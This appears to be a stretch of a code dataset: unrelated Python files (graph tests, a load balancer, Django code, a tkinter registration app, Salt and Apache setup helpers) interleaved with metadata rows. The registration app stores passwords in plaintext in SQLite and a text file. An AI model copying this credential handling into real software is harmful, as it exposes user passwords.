PrintGStats("ManipulateNodesEdges:Graph3",Graph1)
# save the graph
FOut = snap.TFOut(snap.TStr(FName))
Graph.Save(FOut)
FOut.Flush()
# load the graph
FIn = snap.TFIn(snap.TStr(FName))
Graph2 = snap.TUNGraph(FIn)
PrintGStats("ManipulateNodesEdges:Graph4",Graph2)
# remove all the nodes and edges
for i in range(0, NNodes):
n = Graph.GetRndNId()
Graph.DelNode(n)
PrintGStats("ManipulateNodesEdges:Graph5",Graph)
Graph1.Clr()
PrintGStats("ManipulateNodesEdges:Graph6",Graph1)
def GetSmallGraph():
'''
Test small graph
'''
Graph = snap.TUNGraph()
Graph.GetSmallGraph()
PrintGStats("GetSmallGraph:Graph",Graph)
if __name__ == '__main__':
print "----- DefaultConstructor -----"
DefaultConstructor()
print "----- ManipulateNodesEdges -----"
ManipulateNodesEdges()
print "----- GetSmallGraph -----"
GetSmallGraph()
| 21.739837 | 81 | 0.590501 | 297 | 2,674 | 5.289562 | 0.3367 | 0.098663 | 0.032463 | 0.028008 | 0.061108 | 0.061108 | 0.038192 | 0.038192 | 0 | 0 | 0 | 0.022268 | 0.277861 | 2,674 | 122 | 82 | 21.918033 | 0.7913 | 0.081152 | 0 | 0.180556 | 0 | 0 | 0.174596 | 0.081624 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.041667 | null | null | 0.069444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
788e0638a7912e25398b0f82d66adabc2d629b91 | 1,381 | py | Python | weighted_round_robin.py | ppd0705/cheatsheet | 224a50cb69ad82d4134b2b40a204731b2d71c22d | [
"MIT"
] | null | null | null | weighted_round_robin.py | ppd0705/cheatsheet | 224a50cb69ad82d4134b2b40a204731b2d71c22d | [
"MIT"
] | null | null | null | weighted_round_robin.py | ppd0705/cheatsheet | 224a50cb69ad82d4134b2b40a204731b2d71c22d | [
"MIT"
] | null | null | null | from typing import List
class ServerConfig:
def __init__(self, addr: str, weight: int):
self.addr: str = addr
self.weight: int = weight
self.cur_weight: int = 0
def __repr__(self):
return f"\n [Server]addr:{self.addr}, weigh:{self.weight}, cur_weight:{self.cur_weight}"
class WeightedRoundRobin:
def __init__(self):
self.server_list: List[ServerConfig] = []
def load_config(self, config):
for addr, weight in config:
self.server_list.append(
ServerConfig(addr, weight)
)
def next_item(self) -> str:
index = -1
total = 0
size = len(self.server_list)
for i in range(size):
self.server_list[i].cur_weight += self.server_list[i].weight
total += self.server_list[i].weight
if index == -1 or self.server_list[index].cur_weight < self.server_list[i].cur_weight:
index = i
self.server_list[index].cur_weight -= total
print(self.server_list)
return self.server_list[index].addr
def test():
config = [
("192.168.0.1", 1),
("192.168.0.2", 2),
("192.168.0.3", 1),
]
robin = WeightedRoundRobin()
robin.load_config(config)
for i in range(12):
print(i, robin.next_item())
if __name__ == "__main__":
test()
| 24.660714 | 99 | 0.577118 | 180 | 1,381 | 4.194444 | 0.266667 | 0.145695 | 0.203974 | 0.07947 | 0.193377 | 0.157616 | 0 | 0 | 0 | 0 | 0 | 0.033916 | 0.295438 | 1,381 | 55 | 100 | 25.109091 | 0.742035 | 0 | 0 | 0 | 0 | 0.025 | 0.088342 | 0.038378 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.025 | 0.025 | 0.275 | 0.05 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
788e8236832189bd8502b010fdb3dd0a1e59ce61 | 2,181 | py | Python | project/store/migrations/0014_auto_20220225_2209.py | aliharby12/Book-Store | d2d1d374f58ad1e64e5e470567f6cf347f5cf09a | [
"MIT"
] | null | null | null | project/store/migrations/0014_auto_20220225_2209.py | aliharby12/Book-Store | d2d1d374f58ad1e64e5e470567f6cf347f5cf09a | [
"MIT"
] | null | null | null | project/store/migrations/0014_auto_20220225_2209.py | aliharby12/Book-Store | d2d1d374f58ad1e64e5e470567f6cf347f5cf09a | [
"MIT"
] | null | null | null | # Generated by Django 3.2.12 on 2022-02-25 22:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('store', '0013_auto_20220224_2311'),
]
operations = [
migrations.RenameModel(
old_name='CartItem',
new_name='OrderItem',
),
migrations.RemoveField(
model_name='order',
name='address_detail',
),
migrations.CreateModel(
name='Payment',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('stripe_charge_id', models.CharField(max_length=50)),
('amount', models.DecimalField(decimal_places=2, max_digits=6)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Address',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True, db_index=True)),
('modified', models.DateTimeField(auto_now=True)),
('city', models.CharField(max_length=256)),
('street_1', models.CharField(max_length=256)),
('street_2', models.CharField(blank=True, max_length=256, null=True)),
('zip_code', models.CharField(max_length=10)),
('comment', models.TextField(blank=True, null=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='order',
name='address',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.DO_NOTHING, to='store.address'),
preserve_default=False,
),
]
| 38.946429 | 121 | 0.581843 | 224 | 2,181 | 5.486607 | 0.419643 | 0.032547 | 0.045566 | 0.071603 | 0.387307 | 0.310822 | 0.25712 | 0.25712 | 0.25712 | 0.133442 | 0 | 0.032134 | 0.286566 | 2,181 | 55 | 122 | 39.654545 | 0.757712 | 0.021091 | 0 | 0.306122 | 1 | 0 | 0.093296 | 0.010783 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.061224 | 0 | 0.122449 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
789ecd7f205ac32e1321d079bdbf084feed9bd43 | 2,628 | py | Python | volunteerapp/views.py | mclark4386/volunteer_connection | d869da4ada3cf17d5ff857ecab9e486b696063aa | [
"MIT"
] | null | null | null | volunteerapp/views.py | mclark4386/volunteer_connection | d869da4ada3cf17d5ff857ecab9e486b696063aa | [
"MIT"
] | 31 | 2017-10-23T20:21:11.000Z | 2017-12-14T00:28:56.000Z | volunteerapp/views.py | mclark4386/volunteer_connection | d869da4ada3cf17d5ff857ecab9e486b696063aa | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth import authenticate, login
from django.views.generic import View
from django.contrib.auth.models import User
from .forms import UserForm
from .models import UserProfile, Project, Tag
from .search import get_query
def Leaderboard(request):
users = User.objects.all()[:5]
context = {"users":users}
return render(request, 'volunteerapp/leaderboard.html', context)
def ProjectDetail(request, project_id):
project = get_object_or_404(Project, pk=project_id)
context = {"project":project}
return render(request, 'volunteerapp/project_detail.html', context)
def Index(request):
projects = []
query_string = ''
selected_tag = ''
tags = Tag.objects.all()
project_set = Project.objects
if ('tag' in request.GET) and request.GET['tag']:
try:
selected_tag = int(request.GET['tag'])
project_set = Tag.objects.get(id=selected_tag).project_set
except ValueError as e:
pass
if ('q' in request.GET) and request.GET['q'].strip():
query_string = request.GET['q']
search_query = get_query(query_string, ['title', 'description'])
project_set = project_set.filter(search_query).order_by('-created_at')
projects = project_set.all()
context = {"projects": projects, "query_string": query_string, "tags": tags, "selected_tag": selected_tag}
return render(request, 'volunteerapp/index.html', context)
class UserFormView(View):
form_class = UserForm
template_name = 'volunteerapp/registration_form.html'
# display empty form
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
# process form post
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
# any custom validation or cleaning
username = form.cleaned_data['username']
password = form.cleaned_data['password1']
if len(password) < 8: # if password is shorter than 8 chars
return redirect(self)
user.save()
if user.profile is None:
user.profile = UserProfile()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('volunteerapp:index')
return render(request, self.template_name, {'form': form})
| 36.5 | 110 | 0.651065 | 316 | 2,628 | 5.281646 | 0.316456 | 0.03595 | 0.05692 | 0.055722 | 0.115039 | 0.115039 | 0.051528 | 0.051528 | 0 | 0 | 0 | 0.00501 | 0.240487 | 2,628 | 71 | 111 | 37.014085 | 0.831162 | 0.040335 | 0 | 0.035088 | 0 | 0 | 0.098927 | 0.047279 | 0 | 0 | 0 | 0 | 0 | 1 | 0.087719 | false | 0.070175 | 0.122807 | 0 | 0.385965 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
78a80518172fc9f436295e54d6a5409fd478b55c | 12,592 | py | Python | registration.py | shubham9019/omega_attendance_manager | 8380be39c73ee80881a0d85e31fa6d77241b6ef7 | [
"MIT"
] | null | null | null | registration.py | shubham9019/omega_attendance_manager | 8380be39c73ee80881a0d85e31fa6d77241b6ef7 | [
"MIT"
] | null | null | null | registration.py | shubham9019/omega_attendance_manager | 8380be39c73ee80881a0d85e31fa6d77241b6ef7 | [
"MIT"
] | 2 | 2021-10-04T16:11:28.000Z | 2021-10-04T16:26:48.000Z | from tkinter import *
from tkinter import messagebox
import sys
import os
import signal
import time
from subprocess import *
from tkinter.scrolledtext import ScrolledText
import sqlite3
def file_previous_close():
try:
with open('home_id.txt', 'r') as f:
lines = f.read().splitlines()
last_line = lines[-1]
page=lines[-2]
if(page!='registration'):
os.kill(int(last_line),signal.SIGKILL)
except:
print('first instance no need to close previous file')
#file_previous_close()
def writing_id():
file_home_id=open("home_id.txt","w+")
home_id=os.getpid()
file_home_id.writelines('registration\n')
file_home_id.writelines(str(home_id))
file_home_id.close()
print('writing id')
print(home_id)
def write_message_no(number):
file=open("message.txt","w+")
file.writelines(number)
file.close()
def login_details(username,password):
file=open("login_details.txt","w+")
file.writelines(username+'\n')
file.writelines(password)
file.close()
#writing_id()
class Home():
def __init__(self,master):
menu = Menu(master)
master.config(menu=menu)
home=Menu(menu)
menu.add_cascade(label='Home',menu=home)
home.add_command(label='How to use?',command=self.take_a_tour)
home.add_command(label='Terms of Use',command=self.terms_of_use)
home.add_separator()
login_option=Menu(menu)
menu.add_cascade(label='Register and Login',menu=login_option)
login_option.add_command(label='Login',command=self.login)
login_option.add_command(label='Register',command=self.register)
login_option.add_separator()
submenu = Menu(menu)
menu.add_cascade(label='Help', menu=submenu)
submenu.add_command(label='Contact Us',command=self.contact_us)
submenu.add_command(label='FAQs', command=self.faq)
submenu.add_separator()
about_us=Menu(menu)
menu.add_cascade(label='About Us',menu=about_us)
about_us.add_command(label='About us',command=self.about_us)
about_us.add_separator()
exit_button=Menu(menu)
menu.add_cascade(label='Exit',menu=exit_button)
exit_button.add_command(label='Exit',command=menu.quit)
#can do a prompt to do yes or no
exit_button.add_command(label='Minimize',command=self.minimize)
##login frame starts here
frame = Frame(master)
self.username = StringVar(master)
self.password = StringVar()
self.name=StringVar()
self.dob=StringVar()
self.email=StringVar()
self.mobile_number=StringVar()
self.aadhar_number=StringVar()
self.variable = StringVar(master)
self.address_var=StringVar()
self.variable.set("Select Post:") # default value
post_employee=Label(master,text="Post:")
#for options menu of post of employee
w = OptionMenu(master, self.variable, "Maintainance", "Developer", "Engineer","HR")
w.pack(padx=15,pady=3)
employee_name=Label(master,text="Name:")
employee_name.pack(padx=15,pady=4)
employee_name_entry=Entry(master,bd=5,textvariable=self.name)
employee_name_entry.pack(padx=24,pady=4)
Label1 = Label(master, text='Username:')
Label1.pack(padx=15, pady=5)
entry1 = Entry(master, bd=5,textvariable=self.username)
entry1.pack(padx=15, pady=5)
email_label=Label(master,text='Email:')
email_label.pack(padx=15,pady=6)
email_entry=Entry(master,bd=5,textvariable=self.email)
email_entry.pack(padx=15,pady=6)
mobile_label=Label(master,text="Mobile:")
mobile_label.pack(padx=15,pady=7)
mobile_entry=Entry(master,bd=5,textvariable=self.mobile_number)
mobile_entry.pack(padx=15,pady=7)
aadhar_label=Label(master,text="Aadhar:")
aadhar_label.pack(padx=15,pady=8)
aadhar_entry=Entry(master,bd=5,textvariable=self.aadhar_number)
aadhar_entry.pack(padx=15,pady=8)
Label2 = Label(master, text='Password: ')
Label2.pack(padx=15, pady=9)
entry2 = Entry(master,show="*" ,bd=5,textvariable=self.password)
entry2.pack(padx=15, pady=9)
address_label=Label(master,text='Address:')
address_label.pack(padx=15,pady=10)
large_font = ('Verdana', 30)
address_entry=Entry(master,textvariable=self.address_var,bd=10,font=large_font)
address_entry.pack(padx=15,pady=10)
btn = Button(frame, text='Register', command=self.register_submit)
btn.pack(side=RIGHT, padx=5)
frame.pack(padx=100, pady=19)
def register_submit(self):
self.select_employee_type=self.variable.get()
self.username_call=self.username.get()
self.name_call=self.name.get()
self.email_call=self.email.get()
self.aadhar_number_call=self.aadhar_number.get()
self.mobile_number_call=self.mobile_number.get()
self.password_call=self.password.get()
self.address_call=self.address_var.get()
try:
conn = sqlite3.connect('omega.db')
register_db_object = conn.cursor()
login_db_object=conn.cursor()
except:
messagebox.showinfo("Failed", "Can't connect to the server")
print("cant connect")
if(self.select_employee_type=='Maintainance'):
print('Maintainance')
self.salary='30000'
try:
register_db_object.execute("INSERT INTO register (username,password,salary,aadhar_number,email,name,post,phone,address) values (?,?,?,?,?,?,?,?,?)",(self.username_call,self.password_call,self.salary,self.aadhar_number_call,self.email_call,self.name_call,self.select_employee_type,self.mobile_number_call,self.address_call))
conn.commit()
login_db_object.execute("INSERT INTO main.login_details (username,password) values (?,?)",(self.username_call,self.password_call))
conn.commit()
conn.close()
counter=1
except:
counter=0
messagebox.showinfo("Failed", "Can't Register :( Username Occupied ")
elif(self.select_employee_type=='Developer'):
print('Dev')
self.salary = '130000'
try:
register_db_object.execute(
"INSERT INTO register (username,password,salary,aadhar_number,email,name,post,phone,address) values (?,?,?,?,?,?,?,?,?)",
(self.username_call, self.password_call, self.salary, self.aadhar_number_call, self.email_call,
self.name_call, self.select_employee_type, self.mobile_number_call, self.address_call))
conn.commit()
login_db_object.execute("INSERT INTO main.login_details (username,password) values (?,?)",
(self.username_call, self.password_call))
conn.commit()
conn.close()
counter=1
except:
counter=0
messagebox.showinfo("Failed", "Can't Register :( Username Occupied ")
else:
self.salary = '70000'
try:
register_db_object.execute(
"INSERT INTO register (username,password,salary,aadhar_number,email,name,post,phone,address) values (?,?,?,?,?,?,?,?,?)",
(self.username_call, self.password_call, self.salary, self.aadhar_number_call, self.email_call,
self.name_call, self.select_employee_type, self.mobile_number_call, self.address_call))
conn.commit()
login_db_object.execute("INSERT INTO main.login_details (username,password) values (?,?)",
(self.username_call, self.password_call))
conn.commit()
conn.close()
counter=1
except:
print("Unable to register")
messagebox.showinfo("Failed", "Can't Register :( Username Occupied ")
counter=0
try:
print("Checking for mobile number")
write_message_no(self.mobile_number_call)
except:
print("Can't Write Mobile Number")
try:
def send_email(user, pwd, recipient, subject, body):
import smtplib
FROM = user
TO = recipient if isinstance(recipient, list) else [recipient]
SUBJECT = subject
TEXT = body
# Prepare actual message
message = """From: %s\nTo: %s\nSubject: %s\n\n%s
""" % (FROM, ", ".join(TO), SUBJECT, TEXT)
server = smtplib.SMTP("smtp.gmail.com", 587)
server.ehlo()
server.starttls()
server.login(user, pwd)
server.sendmail(FROM, TO, message)
server.close()
email = ''
pwd = ''
recipient = self.email_call
subject = 'Registered with Omega'
body = 'Hi '+self.name_call+',\nYou have successfully registered with Omega Employee Management'+'\nRegards,\nTeam Omega'
send_email(email, pwd, recipient, subject, body)
print("mailsent")
except:
messagebox.showinfo("Error while sending Mail","Mail can't be sent")
if(counter!=0):
messagebox.showinfo("Successfully Registered","Taking you to the Login Page")
call('python login.py', shell=True)
def contact_us(self):
##declare a message box
messagebox.showerror("Contact Us","You can contact us at shubham9019@gmail.com in case software dosen't respond or for any suggestions for improvements.")
print("contact")
def faq(self):
##message box indicating faqs
print('he')
def login(self):
print('login ')
call('python login.py', shell=True)
def register(self):
##create a register Frame
print('register')
#sys.exit()
def take_a_tour(self):
##take a tour of the app
tour_take=Toplevel()
tour_take.geometry("220x180")
tour_take.title("Take a Tour")
message=Message(tour_take,text="Go to Register and Login section to register as an employee. You need to provide the required details. After registration is completed you can login using your login credentials to access your employee dashboard.\n\n")
message.grid(row=0,column=1)
button = Button(tour_take, text="Close", command=tour_take.destroy)
button.grid(row=6, column=1)
print('take a tour')
def terms_of_use(self):
string_terms='''Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: \n \n The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.'''
dialog=Toplevel()
dialog.geometry("310x260")
dialog.title("Terms of Use")
message=Message(dialog,text=string_terms)
message.grid(row=0,column=0)
button = Button(dialog, text="Close", command=dialog.destroy)
button.grid(row=4, column=0)
print('message box having terms of use')
def about_us(self):
top = Toplevel()
top.geometry("230x200")
top.title("About Us")
msg = Message(top, text='This is Omega Employee Management System. This was primarily made as a basic Employee Management System as a project for University Curriculum but later after constantly improving this project and adding features it was made public.\n\n')
msg.grid(row=0, column=15)
button = Button(top, text="Okay", command=top.destroy)
button.grid(row=4, column=15)
print('Display your info')
def minimize(self):
print('minimize the window')
root=Tk()
login_home=Home(root)
root.wm_geometry("1360x1200")
root.title("Register Here")
root.mainloop()
| 36.183908 | 592 | 0.623015 | 1,554 | 12,592 | 4.918275 | 0.217503 | 0.029308 | 0.018317 | 0.025644 | 0.298181 | 0.2325 | 0.203847 | 0.177941 | 0.171137 | 0.171137 | 0 | 0.015591 | 0.261436 | 12,592 | 347 | 593 | 36.288184 | 0.806237 | 0.020966 | 0 | 0.192771 | 0 | 0.028112 | 0.231988 | 0.018764 | 0.004016 | 0 | 0 | 0 | 0 | 1 | 0.060241 | false | 0.064257 | 0.040161 | 0 | 0.104418 | 0.072289 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
78b6b965994bd0785c77caa03eeb03a96a7b1651 | 3,936 | py | Python | mc_states/modules/mc_supervisor.py | makinacorpus/makina-states | 8ae1ccd1a0b614a7f308229c07e1493b06f5883a | [
"BSD-3-Clause"
] | 18 | 2015-02-22T12:53:50.000Z | 2019-03-15T16:45:10.000Z | doc/sphinx/mc_states/modules/mc_supervisor.py | makinacorpus/makina-states | 8ae1ccd1a0b614a7f308229c07e1493b06f5883a | [
"BSD-3-Clause"
] | 20 | 2015-01-20T22:35:02.000Z | 2017-11-06T11:17:34.000Z | doc/sphinx/mc_states/modules/mc_supervisor.py | makinacorpus/makina-states | 8ae1ccd1a0b614a7f308229c07e1493b06f5883a | [
"BSD-3-Clause"
] | 5 | 2015-01-13T04:23:09.000Z | 2019-01-03T17:00:31.000Z | # -*- coding: utf-8 -*-
'''
.. _module_mc_supervisor:
mc_supervisor / supervisor functions
============================================
'''
# Import python libs
import logging
import mc_states.api
__name = 'supervisor'
log = logging.getLogger(__name__)
def settings():
'''
supervisor settings
location
installation directory
'''
@mc_states.api.lazy_subregistry_get(__salt__, __name)
def _settings():
supervisor_reg = __salt__[
'mc_macros.get_local_registry'](
'supervisor', registry_format='pack')
locs = __salt__['mc_locations.settings']()
user = 'user'
pw = supervisor_reg.setdefault(
'password',
__salt__['mc_utils.generate_password']())
sock = '/tmp/supervisor.sock'
data = __salt__['mc_utils.defaults'](
'makina-states.services.monitoring.supervisor', {
'location': locs['apps_dir'] + '/supervisor',
'venv': '{location}/venv',
'conf': '/etc/supervisord.conf',
'rotate': __salt__['mc_logrotate.settings'](),
'pidf': locs['var_run_dir'] + '/supervisord.pid',
'includes': ' '.join([
'/etc/supervisor.d/*.conf',
'/etc/supervisor.d/*.ini',
]),
'services': ['ms_supervisor'],
'configs': {
'/etc/supervisord.conf': {"mode": "644"},
'/etc/logrotate.d/supervisor.conf': {"mode": "644"},
'/usr/bin/ms_supervisorctl': {"mode": "755"},
'/etc/init.d/ms_supervisor': {"mode": "755"},
'/etc/systemd/system/ms_supervisor.service': {
"mode": "644"}
},
'requirements': ['supervisor==3.2.0'],
# parameters to set in supervisor configuration section
'program': {
'autostart': 'true',
'autorestart': 'true',
'stopwaitsecs': '10',
'startsecs': '10',
'umask': '022',
},
'inet_http_server': {
'port': 9001,
'username': user,
'password': pw,
},
'unix_http_server': {
'file': sock,
'chmod': '0777',
'chown': 'nobody:nogroup',
'username': user,
'password': pw,
},
'supervisord': {
'logdir': '/var/log/supervisor',
'logfile': '/var/log/supervisord.log',
'logfile_maxbytes': '50MB',
'logfile_backups': '10',
'loglevel': 'info',
'pidfile': '/var/run/supervisord.pid',
'nodaemon': 'false',
'minfds': '1024',
'minprocs': '200',
'umask': '022',
'user': 'root',
'identifier': 'supervisor',
'directory': '/tmp',
'tmpdir': '/tmp',
'nocleanup': 'true',
'childlogdir': '/tmp',
'strip_ansi': 'false',
'environment': '',
},
'supervisorctl': {
'serverurl': 'unix://{0}'.format(sock),
'username': user,
'password': pw,
'history_file': '/etc/supervisor.history',
'prompt': "supervisorctl",
},
})
__salt__['mc_macros.update_local_registry'](
'supervisor', supervisor_reg,
registry_format='pack')
return data
return _settings()
| 34.226087 | 72 | 0.423526 | 282 | 3,936 | 5.638298 | 0.471631 | 0.022642 | 0.037736 | 0.041509 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021538 | 0.422002 | 3,936 | 114 | 73 | 34.526316 | 0.677363 | 0.066311 | 0 | 0.089888 | 0 | 0 | 0.335991 | 0.124828 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022472 | false | 0.05618 | 0.022472 | 0 | 0.067416 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
78d0fdc99eef8a84cba546e1e44176c8661c6b32 | 354 | py | Python | test_frame/test_redis_ack_able/test_redis_ack_able_consumer.py | DJMIN/funboost | 7570ca2909bb0b44a1080f5f98aa96c86d3da9d4 | [
"Apache-2.0"
] | 120 | 2021-12-26T03:27:12.000Z | 2022-03-31T16:20:44.000Z | test_frame/test_redis_ack_able/test_redis_ack_able_consumer.py | mooti-barry/funboost | 2cd9530e2c4e5a52fc921070d243d402adbc3a0e | [
"Apache-2.0"
] | 18 | 2021-12-31T06:26:37.000Z | 2022-03-31T16:16:33.000Z | test_frame/test_redis_ack_able/test_redis_ack_able_consumer.py | mooti-barry/funboost | 2cd9530e2c4e5a52fc921070d243d402adbc3a0e | [
"Apache-2.0"
] | 27 | 2021-12-26T16:12:31.000Z | 2022-03-26T17:43:08.000Z | """
这个是用来测试,以redis为中间件,随意关闭代码会不会造成任务丢失的。
"""
import time
from funboost import boost,BrokerEnum
@boost('test_cost_long_time_fun_queue2', broker_kind=BrokerEnum.REDIS_ACK_ABLE, concurrent_num=5)
def cost_long_time_fun(x):
print(f'正在消费 {x} 中 。。。。')
time.sleep(3)
print(f'消费完成 {x} ')
if __name__ == '__main__':
cost_long_time_fun.consume() | 23.6 | 97 | 0.731638 | 52 | 354 | 4.538462 | 0.673077 | 0.101695 | 0.152542 | 0.190678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009709 | 0.127119 | 354 | 15 | 98 | 23.6 | 0.754045 | 0.101695 | 0 | 0 | 0 | 0 | 0.199357 | 0.096463 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.333333 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
78d6ac1780a834d58960d00f2b454d544cc545be | 320 | py | Python | a-practical-introduction-to-python-programming-brian-heinold/chapter-01/exercise-07.py | elarabyelaidy19/awesome-reading | 5c01a4272ba58e4f7ea665aab14b4c0aa252ea89 | [
"MIT"
] | 31 | 2021-11-02T19:51:13.000Z | 2022-02-17T10:55:26.000Z | a-practical-introduction-to-python-programming-brian-heinold/chapter-01/exercise-07.py | MosTafaHoSamm/awesome-reading | 469408fefc049d78ed53a2b2331b5d5cecdc6c06 | [
"MIT"
] | 1 | 2022-01-18T12:27:54.000Z | 2022-01-18T12:27:54.000Z | a-practical-introduction-to-python-programming-brian-heinold/chapter-01/exercise-07.py | MosTafaHoSamm/awesome-reading | 469408fefc049d78ed53a2b2331b5d5cecdc6c06 | [
"MIT"
] | 3 | 2022-01-11T05:01:34.000Z | 2022-02-05T14:36:29.000Z | # Write a program that asks the user for a weight in kilograms and converts it to pounds. There
# are 2.2 pounds in a kilogram.
# Enter a weight in kilograms: 7
# The weight in pounds is: 15.4
kilograms = eval(input('Enter a weight in kilograms: '))
pounds = kilograms * 2.2
print('The weight in pounds is:', pounds)
| 29.090909 | 95 | 0.721875 | 57 | 320 | 4.052632 | 0.491228 | 0.17316 | 0.116883 | 0.233766 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031008 | 0.19375 | 320 | 10 | 96 | 32 | 0.864341 | 0.575 | 0 | 0 | 0 | 0 | 0.40458 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1520a48351b4834a95ad9f000db6325507ab5753 | 5,836 | py | Python | wt_plus/core/http.py | andersoncustodio/wt-plus | b31b782fb4dde8a0d92f5aa478797a929a0f8d0c | [
"BSD-3-Clause"
] | 1 | 2022-02-20T19:15:22.000Z | 2022-02-20T19:15:22.000Z | wt_plus/core/http.py | andersoncustodio/wt-plus | b31b782fb4dde8a0d92f5aa478797a929a0f8d0c | [
"BSD-3-Clause"
] | null | null | null | wt_plus/core/http.py | andersoncustodio/wt-plus | b31b782fb4dde8a0d92f5aa478797a929a0f8d0c | [
"BSD-3-Clause"
] | null | null | null | import os
import re
from jinja2 import Template
class Http(object):
def __init__(self, config):
self.config = config
def install(self):
os.system(rf'mkdir -p {self.config.wt_config_path}/sites')
os.system(rf'mkdir -p {self.config.wt_config_path}/log')
os.system(rf'mkdir -p {self.config.wt_config_path}/config')
os.system(r'sudo apt install -y apache2')
os.system(r'sudo a2enmod ssl')
os.system(r'sudo a2enmod actions fcgid alias proxy_fcgi')
os.system(r'sudo a2enmod rewrite')
os.system(r'sudo a2enmod headers')
os.system(r'sudo a2enmod expires')
os.system(r'sudo a2enmod include')
os.system(r'sudo a2enmod proxy')
os.system(r'sudo a2enmod proxy_http')
os.system(r'sudo a2enmod proxy_wstunnel')
def configure(self):
self.install()
# Add custom wt config home user
config_wt = f'Timeout -1\n\nIncludeOptional {self.config.wt_config_path}/sites/*.conf\n'
os.system(fr'sudo /bin/bash -c "echo \"{config_wt}\" > /etc/apache2/conf-available/wt.conf"')
# Configuring envvars
os.system(fr'sudo sed -i "s,^\(export APACHE_RUN_USER=\).*,\1{self.config.user},g" /etc/apache2/envvars')
os.system(fr'sudo sed -i "s,^\(export APACHE_RUN_GROUP=\).*,\1{self.config.user},g" /etc/apache2/envvars')
os.system(r"sudo sed -i 's/Listen 80/Listen 0.0.0.0:80/g' /etc/apache2/ports.conf")
os.system(r"sudo sed -i 's/Listen 443/Listen 0.0.0.0:443/g' /etc/apache2/ports.conf")
os.system('sudo a2enconf wt.conf')
self.restart()
def start(self):
os.system('sudo systemctl start apache2')
def stop(self):
os.system('sudo systemctl stop apache2')
def restart(self):
os.system('sudo systemctl stop apache2 && sudo systemctl start apache2')
def enable(self):
os.system('sudo systemctl enable apache2')
def disable(self):
os.system('sudo systemctl disable apache2')
def filter_proxies(self, proxies):
proxies_pass = list()
proxies_match = list()
if proxies is not None:
